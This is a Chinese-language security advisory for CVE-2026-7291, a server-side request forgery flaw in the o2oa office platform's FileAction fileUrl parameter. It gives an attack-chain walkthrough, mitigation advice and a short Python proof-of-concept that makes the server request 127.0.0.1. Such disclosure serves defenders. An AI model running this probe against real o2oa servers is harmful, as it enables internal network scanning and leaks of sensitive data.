IPBUF安全漏洞报告
English
CVE-2026-7291 CVSS 6.3 中危

CVE-2026-7291 o2oa服务器端请求伪造漏洞

披露日期: 2026-04-28
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7291
漏洞类型
服务器端请求伪造 (SSRF)
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
o2oa

相关标签

SSRFo2oa服务器端请求伪造中危漏洞URL Fetching

漏洞概述

o2oa是一款开源的企业级办公自动化平台。在10.0及之前的版本中,存在一个服务器端请求伪造(SSRF)漏洞。该漏洞源于URL获取组件的FileAction.java文件中的FileAction函数未能正确过滤用户输入的fileUrl参数。攻击者无需用户交互,仅需低权限即可通过构造恶意URL远程发起攻击,利用该漏洞探测内网服务或读取本地敏感文件,目前已有公开的利用代码发布。

技术细节

该漏洞的核心在于o2oa系统在处理文件URL获取请求时缺乏对输入参数的有效校验。具体而言,组件FileAction.java中的FileAction方法接收用户提供的fileUrl参数,并将其直接用于后端的网络请求操作。由于未对目标地址进行IP黑名单过滤(如过滤127.0.0.1, 192.168.x.x等)或协议限制,攻击者可以通过精心构造的HTTP请求,诱导服务器向内网敏感资源(如本地管理端口、数据库接口等)发起请求。这种SSRF漏洞不仅允许攻击者探测内网拓扑结构,还可能结合其他漏洞对内网服务进行进一步攻击。鉴于漏洞利用代码已公开,风险较为现实。

攻击链分析

STEP 1
侦察
攻击者识别互联网上暴露的o2oa服务实例,并确认其版本为10.0或以下。
STEP 2
构造攻击载荷
攻击者构造包含恶意fileUrl参数的HTTP请求,该参数指向内网敏感地址(如127.0.0.1或内网段IP)。
STEP 3
发送请求
攻击者向存在漏洞的FileAction接口发送特制的请求包。
STEP 4
服务端请求
o2oa服务器解析请求,代替攻击者向内网目标地址发起连接请求。
STEP 5
信息回显
服务器将内网目标的响应数据返回给攻击者,从而实现内网信息探测或敏感数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Example PoC for CVE-2026-7291 # Target URL structure may vary based on deployment target_url = "http://<target_ip>:<port>/x_program_center/jaxrs/file/test/load" # Malicious payload targeting internal localhost # Change fileUrl to other internal IPs as needed payload = { "fileUrl": "http://127.0.0.1:8080" } try: response = requests.post(target_url, data=payload) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response body:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

o2oa <= 10.0

防御指南

临时缓解措施
由于官方尚未响应,建议暂时在服务器侧配置网络策略,禁止出站访问非业务必要的内网及公网地址。同时,检查并限制相关组件的访问权限,仅允许授权用户调用。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表